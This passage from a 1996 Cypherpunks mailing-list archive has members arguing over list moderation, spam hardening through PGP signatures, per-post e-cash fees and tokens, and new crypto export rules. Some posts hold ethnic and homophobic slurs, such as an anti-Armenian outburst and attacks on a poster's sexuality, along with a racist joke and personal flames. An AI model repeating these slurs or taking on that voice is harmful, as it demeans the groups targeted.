view). Nor do I know of anyone I would want deciding if my essays were
"appropriate." I've watched a lot of moderated lists turn into the private
fiefdoms of the all-powerful moderators.

(On the other hand, the RISKs forum is a roaring success, for various
reasons. The focus on reports of security, safety, and computer bug-related
incidents is perhaps a major reason. Peter Neumann's dedication--and SRI
affiliation, which condones him spending his time on this, I think--is
another.)

And as many have noted, allowing only subscribers to post eliminates
anonymous posters, except by the clever workaround of having subscribers
pass on the anonymous posts. That idea has merit, but also has drawbacks.

For myself, I just make liberal use of filters and am quick on the "D" key
to delete posts that have no interest for me. Even with 100 messages a day,
the 60-70 that make it past my filters can be disposed of in less than half
an hour, including downloading time and spending a few seconds on each
deciding whether to discard it, keep it around for later viewing, keeping
it around for a reply, etc.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Tue, 31 Dec 1996 14:01:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Just another government fuckover: New crypto regulation
Message-ID: <199612312200.OAA08131@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 31 Dec 96 at 13:56, Dr.Dimitri Vulis KOTM wrote:

> 
> "Cypher punks" write stupid racist flames and postmaster complaints,
> not code.

Yes, and they are sad that ebonics IS NOT going to be a course taught 
in school.  I spoke with a source at the Oakland School District who 
said they would not allow papers to be turned in written in ebonics.  
It is just an effort for educators to better understand how their 
students may communicate.  So everyone who liked Tim May's
fake sarcasm are now sad that they made fools of themselves.

> 
> 
> I am not "here" - I've been unsubscribed by the head censor,
> cocksucker John Gilmore at the request of Ray Arachelian and Timmy
> May. They're "here" to harrass and to flame and they don't want
> followups from the victims of their harrassment.

You are correct, there Doctor!  Just look at what just happened to 
me.

> 
> 
> Freedom for whom, or from whom? I have no great despect for Abraham
> "I freed who?" Lincoln, but I like the quote from him: "Those who
> deny freedom to others deserve it not for themselves."
> Some folks on this mailing list remind me of hardcore communists
> that believe that orthodix marxism works, and everyone who tried and
> failed to implement it, was perverting marx's ideas.
> U.S.constitution was an instrument of class warfare. 
> 
> Yes, let's see some more "dissidents" unsubscribed! Let's see some
> more mailbombs and postmaster complaints! Let's see punitive action
> in response to speech! That's all "cypher punks" are good for.
> 

Yes, Yes, Yes!

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 31 Dec 1996 14:23:25 -0800 (PST)
To: "Z.B." <dthorn@gte.net>
Subject: Re: Hardening lists against spam attacks
Message-ID: <v02140b0aaeef4195b36f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:01 PM 12/31/1996, Z.B. wrote:
>On Tue, 31 Dec 1996, Dale Thorn wrote:
>> ...I will *not* install and run PGP.

> I agree with Dale here...requiring PGP in order to post would probably
> deter low-level, idiot spammers, but it would also keep those people off
> the list who, for one reason or another, don't like/want/use PGP.

People who don't like using PGP, or can't use it, or won't use it,
do not belong on this list.

> Also, what about people who post to and read the list from someplace other
> than their home computer, like school or work?  I have access to this account
> from my college, but I'm sure not going to leave my keys lying around
> my account just so I can post to a mailing list.

Easy.  Keep a copy of PGP there and a copy of the list public key.
It's okay to leave public keys lying around.

I might add that this is not "just a mailing list."  It is the
Cypherpunks mailing list.  It's worth a little trouble.  If you don't
agree, find a list which is.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 31 Dec 1996 14:16:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612312032.MAA04214@crypt.hfinney.com>
Message-ID: <v03007801aeef41010ab4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 PM -0800 12/31/96, Hal Finney wrote:

>We might also want to consider the paradoxical possibility that if we
>remove the junk, the list will die!  At least now we are constantly
>reminded that the cypherpunks list exists.  Other lists like the
>cryptography and coderpunks can sometimes go for quite a while without
>any posts at all.  On CP you have the sense of a dynamic community where
>you can hope for a response to your posts, more so than on a list which
>is silent for days at a time.

A very good point. This is what I meant in my last message by saying that
moderated lists can become "moribund." I've seen a bunch of nominally
"quality" lists simply die the death of inactivity because the volume was
so low.

Cypherpunks is like a crowded coffee house, or bar, with people having
various conversations, sometimes shouting, and with debate raging.

It's easier to filter out things I don't want to hear than it is to
_induce_ things I _do_ want to hear! And as I said in my last message, even
with 100 messages a day, this is easily manageable with filtering tools and
a quick hand on the "delete" key.

Massive spam attacks, or denial of service attacks, such as we have seen
several times in the last year or so, are more problematic than mere
"off-topic" or "not what I wanted to read" posts. Solutions to this would
be nice, but I'm not holding my breath.

(It seems to me that majordomo could be hacked to either recognize
subscriptions with some indication of "list" in the name, and not allow the
list to be subscribed to other lists. Not that this would always work (as
"cypherpunks@toad.com" so clearly shows).)

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 31 Dec 1996 14:24:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <v02140b05aeef248fe111@[192.0.2.1]>
Message-ID: <v03007802aeef43649a1c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:04 PM -0800 12/31/96, Peter Hendrickson wrote:
>At 11:47 AM 12/31/1996, Lucky Green wrote:
>>At 10:25 AM 12/31/96 -0800, Peter Hendrickson wrote:
>>> The easiest and fastest solution is to set up toad.com to charge a
>>> dollar per message.  (Proceeds to be spent by John Gilmore as he
>>> sees fit.)
>
>>> We can then leverage off the existing e-cash infrastructure which
>>> already provides blinding software for free on all major platforms.
>
>> I am not sure that this proposal would work. Some of the spammers on this
>> list are rather dedicated. They might gladly pay a dollar per message.
>
>Let's try it and see how it goes.  If it doesn't work, we can try
>a more complicated scheme.  (I volunteer to modify Majordomo to
>make this happen.  We could have this feature in the near future.)

"Let's try it and see how it goes" is often a dangerous step. It could kill
the list as we know it; exactly what fraction of current subscribers do you
think will arrange for digital cash accounts, will arrange their mailing
software to use this, will bother with PGP, etc.?

Now maybe this is a Good Thing, to drive out the slackers and those without
good tools integrating PGP into their mailers, etc., but maybe it is not a
Good Thing .

It seems to me that one should not lightly just say "Let's try it and see
what happens!"

>I have seen a lot of complaints about "too much noise".  That is
>not a problem.  The problem is too little signal.  I can extract
>the signal - unless it isn't there.

My sentiments exactly. But I fail to see how collecting a dollar per post,
or whatever the fee is ultimately set at, increases the number of good
posts (not the percentage, the S/N, the _number_, which is what we both
agree is the important thing).

Explanation?

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 12:22:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Iranian clergic attacks Internet as 'poison' to the m...
In-Reply-To: <9611318520.AA852059472@smtplink.alis.ca>
Message-ID: <TogTZD52w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca writes:

> Subject: RE: Iranian clergic attacks Internet as 'poison' to the masses (
>
> vipul@pobox.com wrote:
> >*** Iranian clergic attacks Internet as 'poison' to the masses
>
> >A senior Iranian cleric called Friday for restricting Internet access
> >because the global computer network fed "poison" to the masses.
>
> I have seen this article elsewhere, and the sentiment is not as nefarious a=
> s it
> sounds. You may know that many Arabic and Persian countries have a heavy
> exposure to French. In this case, the confusion arises due to the similarity
> between the English "poison" and the French "poisson" which means fish.
>
> Restated, the problem is that the Internet is feeding "fish" to the masses =
> in
> the form of information, hence the masses are not feeding themselves.
>
> A similar English adage is: Give a man a fish and he'll eat for a day. Teac=
> h a
> man to fish and he'll eat for the rest of his life.
>
> As the mullah implies, we need to help people to increase their critical
> thinking skills, rather than passively accept what others tell them via the
> Internet.
>
> Start now.
>
> James
>

Fish is good for the brain.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 31 Dec 1996 15:53:36 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
Message-ID: <v02140b0baeef492d7c2f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:32 PM 12/31/1996, Timothy C. May wrote:
>At 1:04 PM -0800 12/31/96, Peter Hendrickson wrote:
>>At 11:47 AM 12/31/1996, Lucky Green wrote:
>>>At 10:25 AM 12/31/96 -0800, Peter Hendrickson wrote:
>>>> The easiest and fastest solution is to set up toad.com to charge a
>>>> dollar per message.  (Proceeds to be spent by John Gilmore as he
>>>> sees fit.)

>>>> We can then leverage off the existing e-cash infrastructure which
>>>> already provides blinding software for free on all major platforms.

>>> I am not sure that this proposal would work. Some of the spammers on this
>>> list are rather dedicated. They might gladly pay a dollar per message.

>> Let's try it and see how it goes.  If it doesn't work, we can try
>> a more complicated scheme.  (I volunteer to modify Majordomo to
>> make this happen.  We could have this feature in the near future.)

> "Let's try it and see how it goes" is often a dangerous step. It could kill
> the list as we know it; exactly what fraction of current subscribers do you
> think will arrange for digital cash accounts, will arrange their mailing
> software to use this, will bother with PGP, etc.?

It's not always bad to take a few chances.  I've noticed that there is
a lot of negativity in the cypherpunks scene.  (I am not without sin
in this department. ;-)  It would be more exciting to try out a few
ideas.

I would much rather be trying lots of things and throwing out the bad
ones.  This should lead to better technology.  This not only benefits the
cypherpunks list, it benefits everybody using the Net, which is (I think)
one of our goals.  It short circuits poorly intentioned authoritarian
schemes to dictate what may or may not be sent to a mailing list.
(For example, people often propose to make spam illegal.  Most
readers of this list will recognize the camel's nose.)

> Now maybe this is a Good Thing, to drive out the slackers and those without
> good tools integrating PGP into their mailers, etc., but maybe it is not a
> Good Thing.

It could be a mistake, but I think the only way we will find out is
to try it.  Unlike the interesting token scheme, this is easy to deploy
and it doesn't provide an insurmountable barrier to dissent.  You
can still put up a dollar to say "This is a drag!  Let's get rid
of it!"  But if your token gets pulled by an abusive token administrator,
it's harder to get the word out.  (Not impossible, though.)

Keep in mind that the worst case is that people will have to ask
their e-cash endowed friends for a few ASCII tokens to prepend to
their posts to the list.  That is not very tough to arrange.

>> I have seen a lot of complaints about "too much noise".  That is
>> not a problem.  The problem is too little signal.  I can extract
>> the signal - unless it isn't there.

> My sentiments exactly. But I fail to see how collecting a dollar per post,
> or whatever the fee is ultimately set at, increases the number of good
> posts (not the percentage, the S/N, the _number_, which is what we both
> agree is the important thing).

> Explanation?

One thing it does for sure is to eliminate attacks where somebody sends
thousands of messages to toad.com and overloads its capacity to forward
them.  It also means that bigger faster hardware can be purchased if
the load gets too high, or to compensate somebody to wrangle majordomo.

I suspect it will also promote high quality posting.  Certainly,
"me too" posts and "unsubscrive" posts will be greatly attenuated.
And, people who post reams of drivel and invective can only do so
at the expense of financing the monthly cypherpunks food bash.  This
doesn't mean they will stop, but it does mean that we can chown down
on hundreds of pounds of guacamole at their expense.

As for other people, I think if it isn't worth a dollar to you to
post a message, it probably isn't worth it for the rest of us to
read it.  Without any real evidence, my feeling is that if somebody
has to pay a dollar to post a message, they will give it more
thought and write it more carefully.

This is sort of like expecting children to use proper grammar, forms,
and excellent handwriting in preparing a report.  The result is that
greater care and thought is devoted to the ideas in the report itself.

I don't believe that people making valuable contributions have any
trouble at all coughing up a dollar to do so.  Very few people post
more than 10 messages a month.  $10/month isn't much of a burden.

If this does turn out to be a problem, when readers see a post they
like they should send the person a buck to encourage more good work.
This is a very effective way of saying "I really enjoyed what you
had to say."

And, nothing stops frequent posters from asking for money on the
list to continue their fine work.

In a sense, this is a fully abstracted version of the token scheme.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 31 Dec 1996 15:51:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Anonymous Post Control
Message-ID: <v02140b0caeef4ce75c72@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


It's hard to filter anonymous posters.  I want to see what a few
of them have to say so I can't filter on the remailers.

If anonymous posters PGP sign their posts, it is still hard to filter
using a lame filter software such as that which comes to Eudora.

It would be nice if toad.com would verify signatures and insert a
header into the messages with the PGP User Id of every poster.
Then it would be very easy for many people to filter the messages
using widely available off-the-shelf mail software.

(I volunteer to adapt majordomo for this task if it seems like
a good idea.)

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 31 Dec 1996 15:51:57 -0800 (PST)
To: Douglas Barnes <cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
Message-ID: <v02140b0eaeef52d6c14f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:04 PM 12/31/1996, Douglas Barnes wrote:
> The problem with payment schemes like this is that they're hard
> to rationalize (as Lucky points out here).

> A direct mail piece (via snail mail) can easily cost the sender
> more than a dollar when all costs are taken into account. This
> does not seem to have appreciably slowed down junk mailers IRL.

> Spam to a large mailing list has a multiplicative effect (although
> it's also easier to throw out and/or ignore.) Certainly if someone
> had a real product, it would be worth anywhere from $1 to $25 to
> post an advertisement to a sizeable mailing list.

> On the other hand, a blanket charge would serve as a disincentive
> to people who make valuable contributions, unless it were a
> completely negligible cost, in which case the advertisers would
> have no problem coughing up the money. There's a serious imbalance
> between how annoying spam is and how much we're willing to pay
> to post (most of us would like to see them charged to the point
> where they wouldn't do it at all.)

It won't be worthwhile for a year or two for spam artists to go to the
trouble of figuring out how to do this.  I'm not sure I have a good
solution to this problem in the long term, however.

If our custom was to send money to people who make good posts, then
you could imagine the fee being quite high, say $20, since most of
the money will be made back.  Voila! We have a wonderful feedback
system for how much contribution we have made.

People who want to make sure that they are putting in at least as
much as they take out can make a little rule for themselves: I won't
take money out of my cypherpunks e-cash account.  I will only
send it to other people for their good posts.  In effect, this is
a fully distributed tokening system without the choke point of
a single token administrator.

> In general it seems very difficult to balance the various aspects
> of maintaining a lively discussion, fostering a sense of community,
> allowing anonymous postings, and keeping the whole thing simple
> enough to actually implement.

I agree that we should keep it sweet and simple.  That's one nice
aspect of the e-cash scheme.  All the software is already out there,
except (maybe) the majordomo part which I have volunteered to do.

Keep in mind that if the list brings in, say, $1000/month that buys
a lot of food.  I have to think that this will liven up the
monthly meetings and create many positive and lasting relationships.

> I've been on the verge of responding to certain posters over the last
> few months, and I've realized before I've hit the "send" key that
> I'd be giving them just what they want -- attention -- while further
> degrading the signal to noise ratio.

This is exactly the sort of process which is facilitated by paying
a dollar.  In your case it won't make a difference, but most people
will find their presence on the list becomes much more responsible
when they have to put up a buck.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 31 Dec 1996 13:05:10 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Responsibility
In-Reply-To: <XB0sZD45w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961231160501.14558A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> I'm not as good as my friend Serdar Argic, but I'm getting better.
> 
>                       FUCK THE ARMENIANS.
> 
> P.S. I've been talking to a rich friend of mine who contributes a lot of
> money to the Museum of Natural History, a major client of Earthweb, about
> Ray Arachelian's libel and net-abuse.

OOh, maybe I should forward all your posts to your rich friend of yours 
just so this rich friend of yours who contributes to the Museum of 
Natural History will see what a racist and homophobe you truly are.

As for your "Fuck the Armenians" comment, that speaks for itself, I 
needn't comment on it.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Tue, 31 Dec 1996 15:13:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ebonite Notes from All Over
Message-ID: <199612312313.QAA09275@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


1. J. Jackson apparently now finds "ebonics" to be a "Goot Thang"(SM): _S.F.
Examiner_ reporter Venise (sic) Wagner headlines in the paper's Web site
today that "Jackson backs Oakland 'ebonics.' Rights leader switches position
after hearing about program in detail." Says Jackson: "The first message the
came out was that the district was going to make black language equitable
(sic) as another language.  That is not the idea." Is Mr. Jackson speaking
in Ebonics?

2. From "A Brief History of Plastics": "Ebonite (TM) is produced by heating
natural rubber with about 10% by weight of sulpher.  This is about five time
more sulpher than would be used in conventional vulcanisation. The material
is hard, black and tough and bears a striking resemblance to the hardwood,
ebony--hence its name. The main use for ebonite in the early 1800s was in
piano keys."

3. Although Ebonite International sponsors the Professional Bowling
Association's "Ebonite Classic" tournament, the Official ABC/WIBC Ruling on
Ball Cleaners, as at 9/12/96, has ruled that their 1-and-2-Step Reactive
Resin Ball Cleaners "cannot be used during ABC/WIBC sanctioned competition
because it would be in violation of Rule 19." But take heart: the American
Bowling Conference Equipment Specifications Department has decided that
"these products are allowed before or after league and/or tournament sessions."

4. What's the difference between a bowling ball and a black woman?  If
you're really, really hungry, you can always eat the bowling ball.

N.B. I personally find #4 above to be racist, sick, and not very "funny" at all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 31 Dec 1996 13:23:23 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Zippy, anonymously
Message-ID: <199612312119.QAA09894@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


http://www.metahtml.com/apps/zippy/welcome.mhtml

Let Zippy provide you with web service.  Chaining through the
anonymizer works, too. :)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 13:53:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <Pine.3.89.9612310958.A19648-0100000@netcom16>
Message-ID: <k6kTZD55w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Bostick <abostick@netcom.com> writes:
> On Tue, 31 Dec 1996 ichudov@algebra.com wrote:
>
> > Send a number of unique tokens to each subscriber each day.  Enforce a
> > rule that only posts with valid current tokens may be accepted. The
> > number of tokens should initially be very small (say, one per day) and
> > then should be quickly increased to a sufficient number, like 10 or 20,
> > as the subscriber shows a record of using tokens properly (as defined by
> > acceptable content rules).
> >
> > A database is kept as to who was issued which tokens.
> >
> > If tokens are used improperly (to post off-topic materials) the
> > offending subscriber is denied any further tokens.
> >
> > The problem of this scheme is (besides its cost) that anonymous users
> > will not be truly anonymous.
>
> This scheme wouldn't necessarily map True Names to tokens; merely
> list subscriptions.  If an account at a nymserver were to subscribe,
> there would be no way to identify the account holder.
>
> The real problem is that there could be a lot of subscriptions
> from a site like  nymserver.bwalk.com . . . .

Dr. Grubor has proposed that homosexuals be required to identify themselves
in e-mail headers. What about banning people who identify themselves as
homosexuals (or fraudulently fail to identify themselves)?

By the way, how come it's mostly homos like Bostick who
contribute to censorship threads?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 31 Dec 1996 14:20:28 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: New crypto regulations
In-Reply-To: <v03007800aeede9f25d5c@[207.167.93.63]>
Message-ID: <199612312235.QAA00478@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. May said:
> At 12:07 PM -0800 12/30/96, Lucky Green wrote:
> Net of course (stego, hidden, remailed, whatever).
> 
> The whole book thing is an oddity...no meaningful crypto is going to be
> helped or hindered by the book exception.

     I disagree. The thing about exporting crypto code in book for is that 
it allows budding anarc^h^h^h^h^h cryptographers and crypto-programmers
specific examples of algorythm implementation. 

     It allows people outside the US to learn about and write good crypto.

     I, for one, don't care _where_ the code gets written, as long as I can
get it, and use it. France, Libya, Russia, or Albania, it doesn't matter
WHERE the keyboard is, with the internet it is all 30 or 40 hops away.

     Of course, that is the problem. Soon we will see the banning of 
IMPORT of strong crypto. 

     These people are either very stupid, or very bright. Either way, they
are not on friendly terms with freedom.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 31 Dec 1996 14:51:19 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <32C94D58.3CBB@gte.net>
Message-ID: <199612312306.RAA00569@smoke.suba.com>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 31 Dec 1996 15:28:55 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Internal Passports
In-Reply-To: <v03007802aeef121590c5@[207.167.93.63]>
Message-ID: <199612312343.RAA00759@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 12:59 PM -0600 12/31/96, snow wrote:
> >Mr. May wrote:
> >> My SS card, issued in 1969 (and which I still have, surprisingly enough),
> >> says this. Someone said recently here on the list that this line was
> >> dropped in more recent years.
> >     I had to have mine replaced recently, and that line is no longer
> >_anywhere_ on the card.
> >     Did they change the laws regarding the use of your SSN as ID, or
> >are most people just ignoring it?
> 
> At the bottom of my SS card are these exact words:
> "FOR SOCIAL SECURITY AND TAX PURPOSES--NOT FOR IDENTIFICATION"

     My original had that, the replacement doesn't. 

     If you, or anyone else would like to see a scan of it, I can have it up
in about 30 seconds. Number obscured of course (not that it is hard to find
it other places). 
> 
> When I had to renew my California Driver's License, I was asked for my SS
> number...a new requirement. I pointed out that the SS number is not for
> identification. The clerk gave me a blank look and said I would not get a
> driver's license without an SS number. I gave in, preferring to fight other
> battles.
> (And I would surely lose this battle, probably even if I spend tons of
> money on mounting a legal challenge.)

     In Illinois, you merely have to request they not put it on the card,
supposedly in Missouri you don't have to have in put on the card if you
have a "religious objection", but I'd bet if you bitch loud enough at the 
DMV office, you can get out of it. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: factnet@rmii.com
Date: Tue, 31 Dec 1996 17:31:41 -0800 (PST)
To: factnet@rmii.com
Subject: Who is the first new web page of 1997?!
Message-ID: <3.0.32.19961231174254.0090ed20@rmi.net>
MIME-Version: 1.0
Content-Type: text/plain


Announcing the healthy birth of a bouncing new web page on 
			January 1, 1997 at 12:00 a.m.:
  
FACTNet International Digest, a non-profit Internet digest, news service,
library, dialogue center, and archive dedicated to the promotion and 
defense of global free thought, free speech, and privacy rights.  

Please come visit and help spin the guest counter at:
     
	**********************************
	**    http://www.factnet.org    **
	**********************************

If you would like to subscribe to our free FACTNews newsletter and 
you cannot access the web, or your browser does not support forms, send 
e-mail to:

		facnet@rmii.com

   With a subject line that reads:   subscribe-FACTNews


===========================================
Happy New Year from the FACTNet staff!   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard W Campbell <woody@hi.net>
Date: Tue, 31 Dec 1996 20:07:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: FinCEN reports from GAO
Message-ID: <32C9E269.FFC@hi.net>
MIME-Version: 1.0
Content-Type: text/plain


A GAO report to congress "MONEY LAUNDERING- Progress Report on
Treasury's Financial Crimes Enforcement Network"(GAO/GGD-94-30) is
available  by snail mail free of charge for the first copy. All one
needs to do is cut-and-paste the form below and send it to the address 
provided. 

The report gives a general overview complete with a few details
describing methodologies. Of particular interest is the "Source
Database" which  "is designed to facilitate coordiation and cooperation
among agencies that might be investigating the same suspects. The
database serves as a central repository for information on suspects
requested from FinCEN as well as ..."
No doubt this will be part of the FAA/Airlines/Law enforcement data
matching scheme when it is eventually implemented. 

The second report(GAO/GGD -95-156) supposedly details changes that the
FinCEN people have suggested as needed improvements in the reporting
system. I just recently requested the second report and haven't read it. 

Aloha,
Woody


email to : orders@gao.gov

just fill out the name and address sections 

_______________________________________________________________________________________
Customer ID Number*:
(* If using ID#, you ONLY need to provide your name)
(**See FAQ Section 2.1 - Customer ID#'s - for details.)

First Name:      

Last Name:

Organization/Division/Office:

Building:

Room #:

Street Address:

City:

State:

Zip:

Country (if not USA):

----  
DOCUMENT/REPORT NUMBERS
For example: HEHS-95-58 (You do not need to include leading
"GAO/")

                            
                                               DATE*
Report #1:GAO/GGD-94-30

Report #2:GAO/GGD -95-156

Report #3:

Report #4:

Report #5:

>>>CUT HERE<<<




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 31 Dec 1996 18:10:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New crypto regs outlaw financing non-US development
Message-ID: <3.0.32.19961231175932.006ab0e8@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:05 PM 12/31/96 -0800, Ian Goldberg wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <3.0.32.19961228225731.006b3080@netcom13.netcom.com>,
>Lucky Green  <shamrock@netcom.com> wrote:
>>First the good news: the export controls mentioned in the draft of the regs
>>on any kind of data security software, regardless if it uses crypto or not
>>did not carry into the final version.
>
>But it _specifically_ restricts virus-checkers (and, also, it would seem,
>backup programs, but that could be stretching it):
>
>ECCN 5D002.c.3:
># ``Software'' designed or modified to protect against malicious
># computer damage, e.g., viruses

My mistake. I overlooked this paragraph. I thought it had not made it into
the final version. Virus checkers, programs like Tripwire, and all firewall
products are export controlled under the new regs. Regardless if the
program uses crypto or not.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 31 Dec 1996 18:09:09 -0800 (PST)
To: "Ross Wright" <cypherpunks@toad.com
Subject: Re: Just another government fuckover: New crypto regulation
Message-ID: <3.0.32.19961231180942.0069e978@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 PM 12/31/96 -0800, Ross Wright wrote:
>On or About 31 Dec 96 at 13:56, Dr.Dimitri Vulis KOTM wrote:
>
>> 
>> "Cypher punks" write stupid racist flames and postmaster complaints,
>> not code.
>
>Yes, and they are sad that ebonics IS NOT going to be a course taught 
>in school.  I spoke with a source at the Oakland School District who 
>said they would not allow papers to be turned in written in ebonics.  
>It is just an effort for educators to better understand how their 
>students may communicate.  So everyone who liked Tim May's
>fake sarcasm are now sad that they made fools of themselves.

I suggest you read the written resolution of the Oakland school board,
rather than listen to the spin control the district was forced to use after
their idiotic plan blew up in their face.

The resolution finds that "ebonics is the primary language" of a majority
of students in the district. The resolutions then requires teachers to
"provide instructions to students in their primary language".

The school board mandates in writing that at least some classes be taught
in Ebonics (ghetto slang).



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
